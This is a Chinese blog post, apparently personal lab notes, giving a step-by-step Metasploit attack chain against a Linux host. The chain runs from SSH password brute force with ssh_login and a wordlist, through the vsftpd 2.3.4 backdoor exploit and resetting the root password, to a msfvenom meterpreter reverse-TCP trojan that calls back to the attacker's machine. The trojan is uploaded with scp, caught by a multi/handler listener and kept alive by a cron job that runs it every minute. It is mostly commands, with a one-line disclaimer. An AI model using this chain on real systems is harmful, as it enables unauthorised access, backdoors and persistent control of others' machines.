linux暴力破解&漏洞利用

已于 2024-06-03 20:51:01 修改
阅读量1.1k 收藏 7
点赞数 26
分类专栏: 网络安全 kali 文章标签: linux 服务器 安全
于 2024-06-03 17:23:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43658613/article/details/139413433
版权

==禁止非法操作,仅限参考=

暴力破解

  • 编辑密码本(vim password.txt)
  • 无声进入msf(msfconsole -q)
  • 搜索ssh_login相关程序(search ssh_login)
  • 设置攻击参数(use 0)
    设置用户名(set username msfadmin)
    设置密码本(set pass_file /root/password.txt)
    设置攻击目标(set rhosts 192.168.10.143)
  • 发起攻击(运行run)
  • 查看攻击会话(sessions)
  • 进入某个会话(sessions ID)
  • 退出(exit)
  • show options://显示程序运行时所需要的参数

漏洞利用

  • 扫描目标是否存在“笑脸漏洞(vsftpd2.3.4)”(nmap -sV ip)
  • 发起漏洞利用
    进入msf(msfconsole)
    搜索vsftpd(search vsftpd)
    使用程序(use 0)
    设置攻击目标(set rhosts ip)
  • 发起攻击(run)
  • whoami://查看是哪个用户
  • passwd root:// 设置密码

植入木马,达到长期控制的目的

  • msfvenom:攻击载荷生成器
    -p://选择一个载荷
    -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
    lhost://监听地址(攻击机kali的地址)
    lport://监听端口(攻击机kali的端口)
    -o:指定输出的文件名
    -h:查看帮助
  • msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序

为了防止上传报错,需要修改kali的ssh配置

  • 创建.ssh目录
    mkdir .ssh
  • 配置config
    vim .ssh/config
  • 添加三行配置
  • Host
  • HostkeyAlgorithms +ssh-rsa
  • PubkeyAcceptedKeyTypes +ssh-rsa
  • 以root身份上传shell后门到192.168.10.143的/mnt
    scp shell root@192.168.10.143:/mnt

运行shell

  • 手动运行shell后门程序
    /mnt/shell & (&后台运行)
  • 在kali中侦听木马程序
  • 进入msf
    msfconsole
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
    ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致

如果想要让木马长期运行不被kill,需要做计划任务,定期运行

  • 编辑计划任务:
  • EDITOR:编辑器
    EDITOR=vim crontab -e
            • /mnt/shell&(每分钟运行一次)
  • 再次进入msf
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
  • 查看计划任务
    crontab -l
  • meterpreter>下将会话放到后台
    background
浪子无悔1412
关注
  • 26
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
密码暴力破解漏洞(kali crunch)
m0_61506558的博客
08-09 1141
Payload set只有一个,但是Payload type类型有很多,以Simple list为例。我们的目的是利用BP里面的字典来暴力破解password的值,进入intruder模块。比如Web网站密码字典、WiFi密码字典、操作系统用户密码字典、数据库密码字典……Add 可以添加自己想加入的字段,Add from list 是BP自带的字典。Option add 规则,先请求一次,后选中接收到的token值,复制。这里先不改,用默认即可,如果有二次竞争则需要修改,现在可以发起攻击了,...
Linux如何禁用root账户
12-16
如果不加限制,黑客可能会利用 root 账户的权限来获取系统控制权,导致系统安全漏洞。因此,禁用 root 账户可以大大减少系统安全风险。 禁用 root 账户的方法 禁用 root 账户可以通过修改 SSH 配置文件实现。SSH...
Linux SSH密码暴力破解技术及攻防实战
Peter 的博客
01-22 6233
对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和加粗样式其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适...
Linux主机密码暴力破解
Kevin's Blog
07-22 1438
一、目标   针对Linux主机SSH协议暴力破解过程以及漏洞原理和修复方式详细介绍。 二、攻击过程
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 2912
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
linux 漏洞 msf,Kali Linux漏洞扫描、漏洞利用、MSF木马生成及权限提升篇
weixin_29704001的博客
05-19 1807
还是老样子,仅供有一定基础的朋友Kali Linux入门,毕竟这不是完整的详细教程,你不一定能看懂,但是原理是没任何问题的。以下都是一些简单的示例:其它的示例以此类推就可以了。一、Kali Linux漏洞扫描Web层面:Kali自带的owasp-zap、w3af系统层面:Openvas、Nessus二、Kali Linux漏洞利用1、漏洞利用复现MS17-010测试msf5 > use ex...
linux暴力破解工具
王者再次归来
02-14 9960
对于 Linux 操作系统来说,一般通过 VNC、Teamviewer 和 SSH 等工具来进行远程管理,SSH 是 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH  为建立在应用层基础上的安全协议。   SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信...
kali linux对Metasploitable2漏洞利用,vnc爆力破解 笔记
边城浪子的博客
09-20 2000
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务端运行在5900端口 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 ...
九、漏洞利用-下
谢小二的博客
06-06 2025
smtp、rpcbind、samba等漏洞利用
Linux环境下Samba远程代码执行漏洞探析.pdf
09-06
2. 漏洞利用原理 漏洞的成因是 Samba 的 is_known_pipename() 函数中没有检查管道名称中的特殊字符,导致攻击者可以构造恶意的动态链接库文件,并在 Samba 加载该文件时执行恶意代码。 3. 漏洞利用条件 漏洞利用...
lasercrack:Lasercrack-可扩展的Ruby暴力破解框架
05-08
lasercrack-可扩展的Ruby多线程暴力破解框架 运行环境 支持系统:linux/Mac/windows,windows需要安装ruby devKit环境同时安装mysys2库。 支持语言:Ruby 2.2.2及以后的版本 支持爆破模块 ftp ssh telnet smb mysql ...
Linux下openssh升级
04-18
OpenSSH 4.6 或更早版本, 当ChallengeResponseAuthenticaiton 启用时,远程攻击这可以通过S/Key 暴力尝试获得用户帐户信息。当用户帐户存在时将会返回一个不同的响应,这将导致用户信息泄露。攻击者可以利用这个...
Reversing:逆向工程揭密
06-21
11.4.13 暴力破解Defender 409 11.5 Defender中的保护技术 415 11.5.1 局部化的函数级加密 415 11.5.2 混淆应用程序与操作系统 11.5.2 之间的接口 416 11.5.3 处理器时间戳验证线程 417 11.5.4 在运行时生成解密密钥...
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1253
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux中文件查找相关命令比较
lurenyi168的专栏
06-16 465
Linux中与文件定位的命令有find、locate、whereis、which,type。
Linux开发讲课7---Linux sysfs文件系统
最新发布
qq_42837317的博客
06-21 821
Sysfs通过文件和目录的方式组织信息,其中每个文件或目录对应于系统中的一个设备、驱动程序或者其他内核对象。当内核中的设备、驱动程序等对象被创建时,相应的Kobject也会被创建,然后通过Sysfs将其信息暴露给用户空间。Sysfs通常被挂载在/sys目录下,它提供了一种方便的方式,让用户空间的程序可以动态地获取和管理系统中的设备信息,而无需直接访问内核数据结构。(2)创建sysfs文件。其中attr表示将要创建的文件(属性),而show和store分别表示对应的sysfs文件在读和写操作时的回调函数。
SUSE linux的快照和恢复
大龄IT民工
06-19 1170
openSUSE默认提供了通用场景下的快照设置,你也可以根据需要进行修改。
Linux-安装及管理程序
A6985HG的博客
06-19 669
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。
cockpit.socket 如何防止被暴力破解
05-19
cockpit.socket 是 Cockpit 服务的套接字文件,用于远程管理 Linux 系统。要防止暴力破解,可以采取以下措施: 1. 强密码策略:使用强密码策略来设置密码,包括长度、大小写字母、数字和特殊字符等。 2. 限制登录尝试次数:可以通过配置 PAM 模块限制登录尝试次数,超过一定次数后就会锁定账户。 3. 使用SSH隧道:Cockpit支持使用SSH隧道连接,这样可以将连接加密,防止中间人攻击。 4. 配置防火墙:可以使用防火墙来限制对 Cockpit 的访问,只允许特定的 IP 地址或 IP 地址范围访问。 5. 定期更新和升级:保持系统和软件更新,以修复安全漏洞和提高系统安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值